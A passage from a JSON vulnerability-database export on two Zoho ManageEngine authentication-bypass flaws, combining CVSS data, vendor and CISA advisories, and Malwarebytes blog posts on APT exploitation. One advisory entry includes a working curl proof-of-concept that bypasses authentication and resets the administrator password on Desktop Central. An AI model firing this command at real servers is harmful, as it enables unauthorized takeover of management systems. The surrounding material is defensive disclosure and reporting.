"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "attackerkb", "title": "CVE-2021-44515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-21T00:00:00", "id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T20:31:26", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-03-16T15:30:13", "description": "An authentication bypass vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Desktop Central Authentication Bypass (CVE-2021-44515)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-03-16T00:00:00", "id": "CPAI-2021-1110", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:31:30", "description": "An authentication bypass vulnerability exists in Zoho ManageEngine ADSelfService Plus. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-14T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine ADSelfService Plus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-14T00:00:00", "id": "CPAI-2021-0879", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-10T00:00:00", "type": "cisa_kev", "title": "Zoho Desktop Central Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2021-12-10T00:00:00", "id": "CISA-KEV-CVE-2021-44515", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Zoho ManageEngine ADSelfService Plus versions 6113 and earlier contain an authentication bypass vulnerability which allows for Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Zoho Corp. ManageEngine ADSelfService Plus Version 6113 and Earlier Authentication Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40539", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "srcincite": [{"lastseen": "2022-02-27T09:44:51", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to bypass authentication on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the StateFilter class. The issue results from an arbitrary forward during request handling. An attacker can leverage this vulnerability to bypass authentication on the system and reset the administrators password.\n\n**Affected Vendors:**\n\nZoho\n\n**Affected Products:**\n\nManageEngine Desktop Central and ManageEngine Desktop Central MSP <= 10.1.2137.2\n\n**Vendor Response:**\n\nZoho has issued an update to correct this vulnerability. More details can be found at: <https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-21T00:00:00", "id": "SRC-2022-0001", "href": "https://srcincite.io/advisories/src-2022-0001/", "sourceData": "curl -kb \"STATE_COOKIE=&_REQS/_TIME/1337\" \"https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed\" -d \"\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": ""}], "malwarebytes": [{"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in questions is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that is was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-21T11:57:15", "description": "Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations \u2014 and it\u2019s no secret that hackers are always looking for security vulnerabilities in them to exploit.\n\nAccording to [research by BetterCloud](<http://pages.bettercloud.com/rs/719-KZY-706/images/2020_StateofSaaSOpsReport.pdf?mkt_tok=NzE5LUtaWS03MDYAAAF8LQdmoC7u54xbqxNwp0au4Zk7SiYaaqq2vupXFxCvaP5vY8gSQtlGFsUsRI8oj5Fl2m5PwIZUUAlzVZL_-hUEQ2RdNqgEzDAmZA5bZtowS_v-zMs>), the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.\n\nCoupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it\u2019s not surprising that businesses and governments are struggling to keep up with the [volume of security vulnerabilities and patches](<https://media.bitpipe.com/io_15x/io_152272/item_2184126/ponemon-state-of-vulnerability-response-.pdf>).\n\nAnd lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit [multiple security vulnerabilities in 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>).\n\nIn this post, we\u2019ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.\n\n## 1\\. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments\n\nFirst publicly announced in early December 2021, [Log4shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance ](<https://blog.malwarebytes.com/glossary/recon/>)and credential harvesting.\n\n## 2. North Korean government backed-groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google's Threat Analysis Group (TAG) [discovered that two North Korean government backed-groups ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>)exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and[ AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by[ exploiting a vulnerability** **](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>)[**(CVE-20**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[2](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[**1-40539)**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)[ in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploited this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payl](<https://blog.malwarebytes.com/glossary/payload/>)[oad ](<https://blog.malwarebytes.com/glossary/payload/.>)to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person's ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil [exploi](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>)[ted a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)[2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya's web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and[ patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided 